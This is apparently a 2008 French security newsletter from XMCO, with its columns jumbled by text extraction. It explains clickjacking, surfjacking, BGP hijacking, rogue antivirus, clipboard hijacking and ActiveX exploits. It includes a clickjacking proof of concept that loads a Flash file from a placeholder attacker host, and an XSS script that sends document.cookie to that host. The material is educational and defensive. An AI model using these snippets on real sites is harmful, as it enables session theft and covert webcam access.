proprits HTML a fait le Buzz
de ce mois de septembre...
Retour sur le ClickJacking et

explications...
XMCO | Partners
Le ClickJacking, une attaque connue, mais jamais En quelques mots, cette attaque permet, lors de la
aboutie visualisation dune page web, de duper lutilisateur
Retour sur le non-disclosure quant au contenu sur lequel il va interagir et donc
excuter des actions son insu.
Aprs le Surfjacking, un autre sujet d'actualit fait
parler de lui. Une fois de plus, les experts en scurit
Robert Hansen, plus connu sous son pseudonyme
RSnake (et fondateur du site ha.kers.org), et Jeremiah
Grossman (que l'on ne prsente plus), ont dcouvert
une faille de scurit critique affectant lensemble des
navigateurs internet.
Cette rcente attaque, nomme Clickjacking ou UI

redress Attack , devait tre prsente par les deux
chercheurs lors de la confrence annuelle de
l'OWASP du 22 au 25 septembre. WWW.XMCOPARTNERS.COM
Cependant, aprs rflexion et vu la porte de leur
dcouverte, ces derniers ont prfr annuler leur
intervention afin de permettre aux diteurs de corriger
le problme avant la divulgation des dtails techniques.
Bien que peu dindices aient t donns durant le mois

de septembre, les passionns ont chang de
nombreux post et plusieurs preuves de concept ont vu
le jour lors de ces dernires semaines. Cest lorsque le
chercheur Guy Aharonovsky a rellement dcouvert
ce qui se cachait derrire cette attaque que les
chercheurs ont publi un article officiel fournissant de
plus amples dtails techniques.

LACTU SCU N21
Le principe Les dtails techniques
La base de cette attaque rside dans le fait que les Il existe un grand nombre de variantes utilises pour
proprits HTML permettent de manipuler laffichage mettre en place une telle attaque. Certains utilisent du
dune page web. Il est possible de positionner des Flash, dautres des iframes ou encore du Javascript...
calques (lment HTML div) des endroits prdfinis Nous avons choisi de dvelopper une preuve de
dune page, et de jouer sur la profondeur lors de la concept fonctionnant sur Firefox (Mac OS X) afin de
superposition de plusieurs calques. vous prsenter de manire gnrale une des
techniques utilises.
En dautres mots, il est possible de crer un site web
contenant deux pages web superposes. Lutilisateur Le langage HTML possde de nombreuses fonctions et
effectue alors des actions sur une autre page que celle proprits. Les deux chercheurs ont utilis une de ces
visualise. options afin de dvelopper leurs preuves de concept.
Lattaque consiste alors placer un calque transparent En effet, il est possible dinclure au sein de balises DIV
en premire position, afin que lutilisateur ne visualise les proprits suivantes:
que le calque en arrire-plan. Le fait deffectuer cette La proprit z-index permet de spcifier la position
manipulation permet dinteragir avec le calque plac en d'empilement d'un bloc par rapport aux autres (notion
avant plan tandis que lutilisateur pense interagir avec de profondeur).
celui en arrire-plan. La proprit opacity permet de spcifier l'opacit
(transparence) d'un lment (ou filter pour Internet
Le schma ci-dessous explique le mcanisme. Explorer).
Ainsi, en utilisant conjointement ces options, nous
pouvons alors obtenir une page web contenant deux
calques HTML superposs.
En attribuant la proprit z-index plus leve au calque

contenant le site malicieux, celui-ci se trouve au
premier plan.
Voici le code HTML de la preuve de concept que nous

avons dvelopp pour Firefox pour Mac OS X :
<div style="z-index:2; opacity:0;

filter:alpha(opacity=10); ">
<embed width="215" height="140" align="middle"

La victime pense visiter et interagir avec le site XMCO pluginspage="http://www.macromedia.com/go/
(calque 2), cependant, elle interagira directement avec getflashplayer" type="application/x-shockwave-
le calque malicieux (1) quand elle voudra cliquer sur les flash" allowscriptaccess="sameDomain"
liens se trouvant sur le site visualis. name="webcamMotion" bgcolor="#ffffff"
quality="high" src="http://www.site-pirate.com/
spy.swf" />
</div>
<div id="page" style="z-index:-1;

position:absolute; top:121px; height:30px;
padding-top:120px; width:100%; text-indent:
40px; ">
<iframe src="http://www.xmcopartners.com"
width="100%" height="100%" frameborder="0"></
iframe>
</div>
Dans la preuve de concept ci-dessus, un premier

calque [1] est plac au dessus du second (avec un
champ z-index :2) et est totalement transparent
(opacity : 0). Ainsi la victime ne va pas pouvoir
visualiser la page du pirate (http://www.site-pirate.com/)

LACTU SCU N21
Le second calque [2] (utilisation dune iframe) est Les diffrentes mthodes dexploitation
plac derrire le premier (z-index :-1) mais celui-ci est Accs au microphone et la webcam dun
visible aux yeux de linternaute (site http:// visiteur
www.xmcopartners.com).
Un des premiers scnarii mis en avant par les auteurs
La victime pense donc naviguer sur le site http:// du ClickJacking concerne lutilisation danimations
www.xmcopartners.com mais chaque clique interagit Flash (voir encadr).
avec le premier calque.
La technologie Flash permet, entre autres, daccder et
de manipuler divers priphriques branchs sur un
poste de travail. Lorsquun site web souhaite accder
au microphone et la webcam dun internaute, une
bote de dialogue est affiche et doit tre valide par le
visiteur afin dautoriser laccs aux priphriques audio/
vido.
Fentre demandant la confirmation lutilisateur
Lattaque du clickjacking permet au pirate dutiliser ces

priphriques divers linsu du visiteur.
En plaant un calque transparent contenant une
animation flash, la fentre avertissant lutilisateur de
confirmer une action sera, galement, transparente.
Une personne mal intentionne peut alors placer un
lien un endroit judicieusement conu pour que
lutilisateur confirme une action malicieuse sans sen
rendre compte.
INFO
Lutilisation malicieuse des animations
Flash...
Les animations Flash sont de redoutables

armes pour les pirates. Comme nous
lavions dj signal lors de notre
numro 21 (lien), les anciennes versions
de Flash Player permettaient denvoyer
des requtes sur des domaines externes
en changeant mme les enttes...
Une fois de plus, ces animations ont t
utilises afin daccder au microphone
et la webcam des victimes...
La version 10 du lecteur flash corrigera

en partie certaines de ces failles de
scurit.

LACTU SCU N21
Voici une page malicieuse telle que pourrait la voir un Manipulation des donnes dune autre page
utilisateur visitant notre site web. Il est vident que dans
le cas dune vraie attaque, laffichage serait nettement Un autre scnario parmi tant dautres pourrait
amlior... concerner la reconfiguration dun routeur personnel...
En incluant la page dadministration du routeur (attaque
spcifique pour un routeur donn) dans notre iframe, un
attaquant pourrait forcer un utilisateur effectuer des
actions non dsires.
En effet, de nombreux routeurs offrent la possibilit de

mettre un ordinateur en DMZ et ainsi de natter
automatiquement tous les services accessibles sur la
machine positionne en DMZ. Pour cela un simple clic
permet de configurer la boxe de la sorte.
On pourrait donc imaginer quun pirate inclut la page

par dfaut dun routeur ( savoir 192.168.1.1/router.html
dans notre exemple) et incite lutilisateur cliquer sur le
bouton configurer la DMZ sur cet ordinateur.
Page malicieuse avec une transparence de 100% pour
le calque contenant lanimation flash Nous avons pu dvelopper une preuve de concept qui
cette fois-ci fonctionne sur la majorit des navigateurs.
En cliquant sur le lien Accder au site, lutilisateur va
cependant accepter que le site malicieux gre sa
webcam et son microphone.
En effet, ce site contient une animation flash

transparente au premier plan. Le lien tant situ
lemplacement du bouton Autoriser lutilisateur donne
alors les droits au site dutiliser sa webcam et son
microphone. La bote de dialogue est ici totalement
invisible...
Voici la mme page avec une transparence de 66%

pour le calque contenant lanimation flash. La bote
davertissement est alors visible...
Interface dun routeur personnel permettant de natter
tous les ports dun poste
En cliquant sur le lien propos, la victime rendrait, son

insu, sa machine accessible depuis internet avec tous
les ports natts.
Mme page que prcdemment avec une transparence

de 66%.
En effectuant cette attaque, un pirate peut alors

enregistrer les flux vido et audio de votre webcam et
de votre microphone.
Page telle que pourrait la voir un visiteur

La page de configuration du routeur de la victime est Webographie
donc invisible ses yeux. Or en suivant le lien Accder
au site, ce dernier clique en ralit sur le bouton qui [1] Site de Robert Hansen
permet de mettre sa machine en DMZ. http://ha.ckers.org
[2] Site de Jeremiah Grossman

http://jeremiahgrossman.blogspot.com/
INFO
Un test grandeur nature
Le laboratoire XMCO a dvelopp pour nos

Mme page avec une transparence de 50% pour lecteurs deux preuves de concepts afin
liframe contenant linterface dadministration du routeur de comprendre clairement lattaque.
La premire affiche la webcam du

Autres scnarii possibles... visiteur (uniquement fonctionnelle sur
Firefox sous Mac OS X).
Nous avons seulement voqu deux scnarii. Il en
existe des dizaines dautres possibles.
URL :
Il est possible de crer une page web avec un http://xmcopartners.com/actu-secu/21/
formulaire pr-remplis qui sera soumis lorsque la poc/clickjacking.html
victime cliquera sur le lien malicieux.
De mme, la validation dActiveX peut galement tre La seconde, fonctionnelle sur tous les
envisage dans le cas o les traditionnelles bote de navigateurs, utilisent une iframe afin
dialogue ne sont pas utilises... de faire cliquer linternaute sur un
La redirection vers un site vrol, les fraudes aux autre lien.
clics... Bref un grande nombre de possibilits sont
maintenant offertes aux pirates... URL :
http://xmcopartners.com/actu-secu/21/
poc/clickjacking-iframe.html
Conclusion
Cette nouvelle attaque web est donc simple mettre en

oeuvre, mais particulirement efficace. Les deux
chercheurs ont parfaitement dmontr quil existe
encore de nombreuses attaques web dcouvrir en se
basant simplement sur des proprits intrinsques aux
langages de programmation (et aux protocoles...cf
Kaminsky).
Dans le cas du ClickJacking, un pirate peut totalement

duper lutilisateur quant aux actions ralises afin d
enregistrer des flux audio et vido linsu de la victime.
Adobe va prochainement sortir une version qui

empchera lexploitation de ce type dattaque. En
attendant, nous vous recommandons vivement
lextension Firefox NoScript qui est particulirement
efficace...

LACTU SCU N21
Le SurfJacking : un driv du MITM

LE SURFJACKING...
Aprs la Defcon de ce mois daot,
certaines prsentations ont fait
davantage parler delles (pour des
raisons inconnues!).
Le surf Jacking est une des

techniques dattaques qui a
particulirement t relaye (un
peu trop notre got) sur
Internet au mois daot 2008.
En quelques mots, il serait

possible dintercepter le cookie
de session dune victime lors
dune communication chiffre...
Oui, premire vue le sujet
semble relativement trange, mais
possible... Explications...
XMCO | Partners
Rappel Le surf Jacking permet de contourner cette scurit

Les cookies de session sous certaines conditions.
Rappelons, tout dabord, le principe des cookies et de

loption Secure. La majorit dentre vous peuvent
directement se rendre au chaptre suivant!
Une authentification est, le plus souvent, base sur un
systme de cookie de session. Une fois authentifi sur
un site web, le serveur dlivre un cookie de session
valide stock et utilis par le navigateur.
Ce cookie permet didentifier lutilisateur pour chacune
des requtes envoyes par le navigateur sur un
domaine prcis.
Un pirate qui coute (sniffer) les donnes changes

entre un utilisateur et un serveur peut lire le trafic non
chiffr. Par consquent, chaque requte HTTP
intercepte contient le cookie de session de la victime

qui peut donc tre vol par le pirate puis rutilis.
En revanche, lorsque la victime navigue via le protocole

HTTPS, le pirate positionn sur le mme brin rseau ne
peut lire les donnes changes ( moins de mener
une attaque volue mettant en jeu des certificats
signs par lattaquant SSL MITM).
Les cookies de session ne peuvent donc, priori, tre

vols si les connexions seffectuent en HTTPS
Oui mais...

LACTU SCU N21
Loption Secure des cookies Le SurfJacking, une attaque pas si rvolutionnaire
Lorigine du problme
Plusieurs options existent lorsquun cookie est dlivr
un client. Une dentre elles est mconnue et se nomme Entrons prsent dans les dtails de cette attaque. Ne
Secure. Cette dernire est dfinie dans la RFC 2965 vous attendez pas du grand art en terme de hacking
(HTTP State Management Mechanism) de la sorte: mais c'est notre devoir de vous informer sur les
nouvelles tendances du moment.
Sous ce nom assez vendeur se cache en ralit une
Secure
attaque base sur un mlange entre le Man in the
Middle, le Sniffing et lexploitation de cookies non
OPTIONAL. The Secure attribute (with no value)
scuriss.
directs the user agent to use only (unspecified)
secure means to contact the origin server
Soyons plus clairs, le problme vient du fait qu'un
whenever it sends back this cookie, to protect the
nombre important de sites en HTTPS nutilisent pas
confidentially and authenticity of the information in
les cookies scuriss. Ainsi lorsqu'un site HTTPS
the cookie.
n'impose pas l'utilisation de ce flag, le cookie de
session associ un nom de domaine est alors envoy
quelque soit le protocole HTTP ou HTTPS utiliss.
En quelques mots, loption Secure dun cookie permet
de garantir que celui-ci soit transmis uniquement lors
dune connexion chiffre (HTTPS). Loption Secure dun cookie permet de
garantir que celui-ci ne soit transmis
En aucun cas, ce dernier ne pourra tre envoy si
linternaute visite la partie non scurise (HTTP) du site uniquement lors dune connexion chiffre
en question. (HTTPS) ...
Pour rsumer, si le pirate force la victime effectuer

une requte sur http://www.banque-en-ligne.fr, le
navigateur de cette dernire enverra quelques soit le
protocole utilis (HTTP ou HTTPS) le cookie associ
ce nom de domaine....Si le pirate parvient intercepter
cette requte, il rcuprera le cookie de session et donc
les clefs pour accder aux contenus privs/authentifis
(HTTPS) de la banque de la victime
Diffrentes manires dexploiter le problme...
Diffrentes mthodes permettent de raliser cette

attaque. Nous vous proposons quelques scnarii qui
permettent dintercepter le cookie de votre victime.
Une seule condition est ncessaire la russite de

lattaque: le pirate doit tre positionn sur le mme brin
rseau que sa victime (afin de pouvoir sniff dans le
cas dun hub, ou de mener une attaque Man in The
Middle sur un rseau switch).
Intressons-nous prsent cette "nouvelle" (si l'on

puisse dire) technique d'attaque baptise le Surf
Jacking.

LACTU SCU N21
Les scnarii dexploitation 1. Le pirate, situ sur le mme rseau local que la
Un email contenant une image pointant sur la victime, envoie un email contenant une image
version non scurise du site (pointant vers ladresse HTTP) de la banque de la
victime tout en coutant le trafic sur le rseau local.
Dans un premier temps, nous considrons que la
victime a pralablement visit le site web HTTPS de sa 2. Lors de la visualisation du mail, le client mail va
banque (https://www.banque-en-ligne.fr), elle tenter de tlcharger limage en question. Le
s'authentifie et obtient un cookie de session valide. navigateur envoie donc le cookie associ sa banque
en ligne afin de visualiser limage contenue dans le
Le pirate va envoyer un email contenant une image mail.
pointant vers la partie HTTP du site de la banque de la
victime. Nous considrons ici que la victime utilise une 3. Le pirate coute (sniff/ARP Poisonning) la
Webmail. communication et rcupre le cookie de lutilisateur qui
a transit en clair sur le rseau local et se connecte sur
En effet, dans le cas dun client Mail, nos tests ont la partie scurise du site de la banque cible.
prouv que le client mail (en loccurrence Mail) ne
partage pas les cookies avec le navigateur Internet
Safari.
Cependant, lors de la visualisation de lemail via une

Webmail, le navigateur va donc tenter de tlcharger
limage en question et de soumettre les cookies
associs au nom de domaine de la banque.
Le schma rsume le principe de lattaque.
Attaque MITM 301 Moved permanently
Une autre mthode prsente notamment par lauteur

du White Paper Surfjacking (voir Webograghie) consiste
se positionner entre la victime et la passerelle dun
rseau local et dcouter le trafic.
Dans ce cas, lattaque repose forcment sur une

technique Man In The Middle (MITM) : lARP
Poisonning. Lattaquant se fait passer pour la
passerelle par dfaut afin de relayer et espionner tout le
trafic envoy par sa victime. Il peut donc modifier le

contenu des pages HTML la vole.
Le SurfJacking est en ralit la consquence

dune attaque Man In The Middle ...
Nous considrons toujours que la victime est
pralablement authentifie sur le site de sa banque.

LACTU SCU N21
Ds quune requte sur un site HTTP est envoye par 3. Le navigateur de la victime redirige la victime vers ce
la victime, le pirate rpond par une rponse HTTP 301 site HTTP en utilisant le cookie de session attribu pour
location. Ce code derreur HTTP indique au navigateur ce nom de domaine si le flag "Secure" n'est pas activ.
de visiter une autre URL (redirection). Ainsi, le pirate
envoie une rponse 301 location pointant vers la partie 4. Le pirate intercepte alors le cookie de session et
non scurise de la banque de la victime. Le navigateur redirige la victime vers le vrai site http://www.google.Fr.
de la victime va donc simplement suivre le lien indiqu
dans le champ Location et soumettre les cookies 5. Le pirate utilise le cookie de session subtilis pour
associs au domaine en question. sauthentifier sur le site bancaire de sa victime.
INFO
Forcer lutilisation de cookie Secure : une
fonctionnalit offerte par certains sites...
Certains sites proposent aux

utilisateurs dutiliser des cookies
secure, cest le cas de Google pour la
messagerie Gmail par exemple. En
choisissant loption
Always use https, lutilisateur ne
pourra sauthentifier en http sur google
et sur les diffrents services proposs.
1. La victime visite nimporte quel site (ici http://

www.google.fr). Le pirate intercepte la requte.
2. Le pirate lui renvoie un "301 Move Permanently"

avec en champs "Location" l'adresse du site http://
www.banque-en-ligne.fr

LACTU SCU N21
Attaque MITM en remplaant des balises images Des cookies vraiment scures?
la vole
Lutilisation de cookies scuriss permet-elle de
Le dernier scnario dexploitation, certainement le plus protger totalement lutilisateur?
probable consiste mener une attaque Man in The La mise en place dun cookie scuris ne met pas
Middle et de remplacer la vole une image dun site lutilisateur l'abri de certaines attaques, elle permet
visit par la victime. Limage ajoute par le pirate pointe seulement dajouter une scurit supplmentaire afin
vers le site de la Banque de la victime en HTTP ce qui a de pallier lattaque dcrite ci-dessus.
pour consquence denvoyer les cookies associs ce
domaine. Le pirate peut donc voler le cookie et se Deux mthodes permettent tout de mme de voler le
connecter sur le site de la Banque. cookie dun utilisateur possdant un cookie scuris.
Un code javascript envoyant le cookie au pirate
Un code javascript excut sur la page HTTPS peut

rcuprer le cookie.
En utilisant une faille de type Cross Site Scripting (XSS)
sur le site vulnrable, le pirate peut alors senvoyer le
cookie de session scuris:
<script>
CookiesStealer = new Image();
CookiesStealer.src = http://www.site-pirate.com/
stealer.php?cookie=+document.cookie;
</script>
Un code JavaScript envoyant le cookie au pirate
La majorit des scnarii dattaque prsents

ncessitent de mener une attaque de Man in The
Middle au pralable. Le pirate peut donc effectuer une
attaque baptise SSL MITM qui consiste fournir
lutilisateur un faux certificat pour les connexions
HTTPS.
Ce dernier aura t autosign par le pirate ou bien

1. La victime visite "http://www.google.fr" ou un autre achet au pralable.
site en HTTP. Le pirate est donc mme de dchiffrer lensemble des
communications puisquil possde la clef prive
2. Le pirate lui renvoie la page HTML du site Google en associe au certificat fourni sa victime.
y insrant la vole une image pointant vers le site

http://www.banque-en-ligne.com. Cependant, si le certificat est seulement autosign, un
message dalerte, affich par le navigateur, pourra
3. Le navigateur de la victime tente de charger l'image alerter la victime.
en utilisant le cookie de session attribu pour ce nom Sans la vigilance de la victime, cette attaque peut
de domaine. Le pirate intercepte alors le cookie de savrer redoutable.
session et laisse passer la requte.
4. Une image (invisible) n'est pas charge lors

de la visualisation de Google mais ceci n'veille
pas les soupons de la victime. Le pirate
sauthentifie avec le cookie de la victime sur le
site bancaire.

LACTU SCU N21
Conclusion
Le surfjacking est donc ni plus ni moins quune

consquence indirecte dune attaque MITM. Cette
dernire vite de mener une attaque SSL MITM afin
de rcuprer le cookie de la victime authentifi sur
un site HTTPS.
Certes, il existe un grand nombre de sites web
vulnrables cette attaque. Il ne nous reste plus
qu conseiller dutiliser des cookies scuriss sur
les sites web utilisant uniquement du HTTPS.
Webographie
[1] Le WhitePaper de Sandro Gauci : Surfjacking

HTTPS will not save you
http://resources.enablesecurity.com/resources/Surf
%20Jacking.pdf
http://enablesecurity.com/2008/08/29/setting-the-
secure-flag-in-the-cookie-is-easy/
[2] RFC 2965 (HTTP State Management Mechanism)

http://www.ietf.org/rfc/rfc2965
INFO
Lextension NoScript
Lextension NoScript pour le navigateur

internet Firefox permet galement de
parer cette attaque. En effet, ce plug-
in rajoute automatiquement loption
Secure chaque cookie utilis par le
navigateur.
http://noscript.net/

LACTU SCU N21
LACTUALIT DU MOIS Lactualit du mois...
Petit tour dhorizon des

vulnrabilits et de lactualit
scurit de ces derniers mois
prsentes par les consultants en
charge de notre service de
veille...
XMCO | Partners
Aprs un t charg, notamment avec la faille de M.Kaminsky, les rcentes confrences BlackHat, Defcon et
OWASP 2008 ont permis de dcouvrir de nouvelles techniques dattaques web et rseau.
Ce mois-ci, nous aborderons la prsentation de Alex Pilosov et Anto Kapela sur le protocole BGP, le
Clipboard Hijacking dAviv Raf ainsi que le dni de service possible des stacks TCP/IP dcouvert par Jack
Louis.
Nous prsenterons galement les exploitations des vulnrabilits Microsoft MS08-041 et MS08-053 publies
sur Internet ainsi quun fait dactualit du moment les Rogues Antivirus.

LACTU SCU N21
Dtournement de trafic via le

protocole BGP
BGP : un protocole de routage faillible Concrtement, lorsqu'un paquet doit tre achemin, le
routeur BGP de l'oprateur consulte sa table de routage
Aprs un mois de juillet particulirement riche en BGP afin de dcouvrir quel prfixe correspond
enseignements (faille DNS de Dan Kaminsky) sur l'adresse IP destination du paquet qu'il doit transmettre.
l'utilisation frauduleuse de certains protocoles Si deux AS sont mme de dlivrer le paquet, celui qui
considrs comme srs, une autre confrence possde le prfixe le plus prcis "gagne".
prsente la DefCon 16 a attir l'attention des
spcialistes en scurit. Le routage est donc bas sur la confiance alloue
chacun des noeuds du circuit.
En effet, Alex Pilosov et Anto Kapela de la socit
Hijacking BOF, ont galement montr avec quelle Lors de cette prsentation la Defcon insre dans le
facilit il tait possible d'exploiter simplement les planning au dernier moment, les deux experts Anto
faiblesses du protocole de routage Internet BGP Kapela et Alex Pilosov ont dmontr qu'il tait possible
(Border Gateway Protocol). de mener des attaques de type "Man in The Middle"
sur Internet et donc d'intercepter des donnes
Le protocole BGP est utilis pour vhiculer des destines un AS donn.
informations sur des rseaux (adresse IP + masque)
entre "autonomous systems" (AS). Une AS tant un
ensemble de rseaux IP contrl par une mme entit:
oprateurs, grande entreprise...
Le but du protocole BGP est de dterminer, partir

INFO...
d'informations transmises par les routeurs voisins, le My ASN
meilleur chemin afin d'atteindre une destination. MyAsn est un service propos par le site
Ripe.net qui permet dalerter les
Chaque routeur possde une table de routage BGP oprateurs ou les entreprises
base sur des "advertisements" mis jour par les responsables dune AS lorsquun autre
routeurs voisins. Chaque AS dclare des plages routeur BGP annonce une route vers
d'adresses IP ou des prfixes IP que les routeurs cet AS de manire incorrecte.
voisins sont en mesure de joindre.
Ainsi, il est facile de contrer les
erreurs de ce type (comme lerreur dun
oprateur Pakistanais pour le site
Youtube) ou du moins dtre rapidement
alert.
Pour cela, les deux chercheurs ont men une attaque

en live dont raffole l'auditoire de ce genre de
confrence, savoir rerouter un trafic via l'envoi de

faux paquets BGP. Cette attaque a permis de dtourner
le trafic entrant sur le rseau de la DefCon vers leur
sige de New York puis le renvoyer vers la DefCon.
L'attaque n'exploite aucune faille de scurit, mais

uniquement le fonctionnement standard du protocole
BGP. Un attaquant muni d'un routeur BGP pourrait
donc intercepter le trafic vers une adresse IP
spcifique. Possdez un tel routeur et une AS nest
cependant pas la porte de tous

LACTU SCU N21
Pour cela, le pirate doit simplement annoncer que son Cependant, cette faille n'tait pas nouvelle. Une erreur
AS est en mesure de dlivrer des paquets destination de ce type avait t mene par mgarde par Pakistan
de la plage d'adresses IP qu'il souhaite pirater. Telecom lorsque ces derniers ont voulu interdire la
L'information se propagera dans le monde entier en navigation de leurs compatriotes sur le site Youtube :
quelques minutes. Les paquets destination de cet AS rsultat, plus personne n'avait accs au site web en
pirat seront redirigs vers le pirate... question!!
L'attaque est astucieuse, mais relativement bruyante : Les deux comparses ont malgr tout utilis des bases
un traceroute vers les IP hijackes permettra de connues afin de mettre en avant leur technique
connaitre le routeur pirate... d'attaque.
Les
Rfrences :
deux chercheurs ont men une
http://blog.wired.com/27bstroke6/2008/08/how-
attaque en live dont raffole l'auditoire de to-intercep.html
ce genre de confrence, savoir rerouter
un trafic via l'envoi de faux paquets BGP...

Des mcanismes existent afin de se prmunir contre ce
type de malversation (voir MyASN ou bien Renesys INFO...
Route Intelligence). Toutefois, les deux auteurs ont, Les piles TCP/IP en danger??
non seulement, russi intercepter un trafic, mais
galement le rerouter afin de berner ces mcanismes
de protection. Une nouvelle surprenante vient d'tre
relaye sur tous les blogs de scurit.
Selon les premires rumeurs, des
chercheurs (Jack Louis et Robert E. Lee
notamment connus pour le dveloppement du
scanner UnicornScan) auraient dcouvert en
2005 une faille au sein du protocole TCP.
Cette faille permettrait de mener des
attaques de dnis de service sur tous les
quipements implmentant une pile TCP/IP.
Ces derniers ont mme dvelopp un outil
permettant d'exploiter cette vulnrabilit
(non disponible actuellement).
Peu d'informations sont actuellement

disponibles. Le problme serait li la
manire dont les ressources sont alloues
aprs le "TCP HandShake" (syn, syn-ack,
ack). L'attaque provoquerait alors une
consommation excessive des ressources et
forcerait les victimes redmarrer le
serveur ou les quipements rseau cibls.
Cette dcouverte doit tre prise avec

prcaution. Cependant, l'information
semble avoir t relaye par Robert
Hansen, expert scurit renomm.

Ces informations seront prochainement
infirmes ou confirmes lors des prochains
jours.
Une interview est dj disponible

l'adresse suivante et des hypothses et
commentaires ont galement t posts sur
le blog de Cdric Blancher.
http://debeveiligingsupdate.nl/audio/
bevupd_0003.mp3

LACTU SCU N21
Les Fake Antivirus
un lien, messages instantans, messages sur les

Et si on installait un antivirus?? rseaux sociaux
En confirmant une boite de dialogue affiche, les
Autre fait dactualit intressant: les fake antivirus ou
phnomne galement baptis rogue AV.
En effet, les diteurs dantivirus ont rpertori un

nombre impressionnant de victimes piges par de faux
programmes antivirus. Depuis le mois daot, plusieurs
milliers de sites malicieux , proposant de faux antivirus,
ont vu le jour.
Les pirates misent sur deux tableaux en fonction de

leurs besoins. Certains vont simplement tenter
dinfecter les internautes crdules (afin de constituer
un botnet par exemple). Dautres vont miser sur la peur
de la victime pour les inciter acheter un autre logiciel.
Les sites web pirates
La premire catgorie de malversations recenses

malwares sont alors proposs en tlchargement. Si
concerne les sites web aux allures de sites
lutilisateur accepte, ce dernier est alors contamin.
dAntivirus officiels (Antivirus2008, Total Secure,
SpamNuker, Antivirus Pro 2009). Ds la visite dun
Les codecs ou autre utilitaires gratuits
internaute, les pirates simulent un scan fictif de leur
machine et affichent un grand nombre de messages Dautres groupes de pirates prfrent utiliser des
dalertes (absence de correctifs, prsence de malware scareware afin de gnrer un maximum de profit. Pour
ou erreurs systme, simulation de boite davertissement cela, les pirates proposent des programmes gratuits :
Windows ). jeux, poker, codecs... Une fois install, un faux antivirus
simule des botes de dialogue, change le papier peint
Cette technique a pour but deffrayer les internautes
du bureau ou encore affiche un cran bleu au
les plus crdules et de les inciter tlcharger une
dmarrage.
version dessai dun antivirus.
Le but des pirates est cette fois-ci purement pcuniaire.
"ATTENTION! If your computer is infected, you Ces derniers esprent forcer les victimes acheter une
could suffer solution antivirale.
data loss,erratic PC behaviour, PC freezes and
Les derniers en date se nomment WinAntispyware
crashes. Detect and remove viruses before they
2008 and Antivirus XP 2008 dtects sous les noms
damage your computer! Antivirus 2009 will perform
TROJ_FAKEAV.RIT et TROJ_FAKEAV.IE.
a quick and 100% FREE scan of your computer for
Viruses, Spyware and Adware.
Do you want to install Antivirus 2009 to scan your

computer for malware now? (Recommended)
'Antivirus 2009 will scan your system for threats

now. Please select "RUN" or "OPEN" when
prompted to start the installation. This file has been
digitally signed and independently certified as
100% free of viruses, adware and spyware."
Plusieurs vecteurs sont utiliss afin de diriger les

internautes vers leur site malicieux: Spam contenant Un trs grand nombre de sites malicieux sont toujours
disponibles (voir plus bas).
LACTU SCU N21
Dancho Danchev, chercheur scurit, suit de prs

lvolution de ce type de site :
http://ddanchev.blogspot.com/2008/10/diverse-portfolio-
of-fake-security.html
URL : hxxp://total-secure2009.com/
Fichier : TotalSecure2009.exe
Rfrences :
[1] http://malwaredatabase.net/blog
[2] http://ddanchev.blogspot.com/
TotalSecure
URL : hxxp://spamnuker.com/
Fichier : OutlookSpamNukerInstaller.exe
INFO...
Un virus intgr dans les ordinateurs Eee PC
Box d'Asus
Asus vient d'annoncer officiellement

qu'un virus tait plac dans le disque
dur de ses mini PC bureautiques "Eee PC
Box".
Le virus est un fichier cach dans la

partition "D:" et porte le nom de
"recycled.exe". Il s'installe sur les
Spamnuker autres partitions des disques durs ainsi
que sur tous les supports amovibles (cl
USB).
Ce malware permet de voler les comptes

de jeux en ligne ou de rcuprer des
adresses email des fins de spam
futures, mais reste dtect par de

nombreux antivirus [1].
Seuls les exemplaires vendus au Japon

seraient affects.
Antivirus2009
Cependant, dautres sites sont rapidement dtects et
bloqus par Firefox.

LACTU SCU N21
Clipboard Hijacking
Le contrle du presse-papier dans votre presse papier et de tomber sur un site web
malicieux exploitant une faille de votre navigateur...
Continuons dans les nouvelles attaques... Ok, scnario digne d'un film de science-fiction
Une vulnrabilit publie galement en septembre a En revanche, linattention de certains internautes

galement touch le lecteur Flash d'Adobe. pourrait provoquer le blocage dun compte si un
utilisateur colle, plusieurs reprises, un mot de passe
Des pirates ont trouv le moyen de contrler le quil pense avoir copi dans son presse-papier.
presse-papier de l'utilisateur via la simple visualisation
d'une animation Flash malicieuse. Il est alors possible Adobe a rapidement pris des dispositions pour corriger
de forcer le presse-papier garder la mme valeur ce problme. La version finale du lecteur Flash 10
jusqu'au prochain redmarrage du navigateur... alertera l'utilisateur lorsqu'une animation Flash tentera
de placer un contenu au sein du presse-papier.
Aviv Raff, chercheur en scurit, s'est intress ce
problme et a publi une preuve de concept. En Rfrences:
utilisant le langage Flash et du code ActionScript, il
est alors facile d'insrer une valeur au sein du presse [1] http://www.intego.com/news/ism0802.asp
papier de sa victime de manire persistante. [2]http://www.securemac.com/applescript-tht-trojan-
horse.php
L'origine du problme concerne la fonction
"System.setClipboard" qui autorise via ActionScript
de positionner une valeur dans le presse-papier du
visiteur.
La preuve de concept en question n'a pu tre obtenue,

mais avec quelques fonctions de Flash, nous avons pu
INFO...
reproduire partiellement le problme (voir le code ci- Un virus intgr dans les ordinateurs Eee
dessous). PC Box d'Asus
Un framework permettant d'exploiter

des vulnrabilits lies la
visionneuse de fichiers PDF, Adobe
Reader, est actuellement utilis par
de nombreux pirates.
Cet outil DIY (Do It Yourself),

portant le nom de "PDF Xploit Pack",
permet en quelques clics de gnrer un
fichier PDF malicieux exploitant des
vulnrabilits connues [1] [2].
Une fois le fichier PDF visualis, le
poste de travail vulnrable tlcharge

des malwares plus aboutis permettant
Code dune animation Flash capable de mettre une entre autres de compromettre d'autres
valeur dans le presse-papier du visiteur systmes situs sur le rseau.
Une interface web permet l'attaquant
La matrise du presse-papier peut s'avrer efficace, de visualiser en temps rel le nombre
mais naurait que de lgres consquences (et non de postes de travail infects.
mener la compromission totale de la machine comme
C'est le troisime framework ddi
certains laffirme). uniquement la cration de fichier
PDF malicieux, les autres tant ZoPAck
Certes, en admettant que vous possdiez un navigateur et El Fiesta.
non patch et que vous visitiez un site pirate
hbergeant cette animation Flash malicieuse, il pourrait
arriver par mgarde de coller le lien malicieux prsent

LACTU SCU N21
Le retour des exploits ActiveX
Encore des exploits... Le code malicieux prend la forme d'une page Web qui
appelle malicieusement le contrle ActiveX wmex.dll
Passons maintenant aux exploits Microsoft. Deux afin dy exploiter un dbordement de tampon.
programmes malicieux ont t publis sur des sites
spcialiss. Ces dernires exploitent les vulnrabilits Cet exploit permet alors de lancer la calculatrice
MS08-041 (ActiveX Snapview) et MS08-053 (Media Windows sur un systme Windows XP SP2
Encoder) corriges en aot et septembre 2008. professionnel anglais. Nous attirons votre attention sur
le fait qu'une lgre modification de ce code permet de
Le premier programme exploite la rcente vulnrabilit prendre le contrle total du systme vulnrable
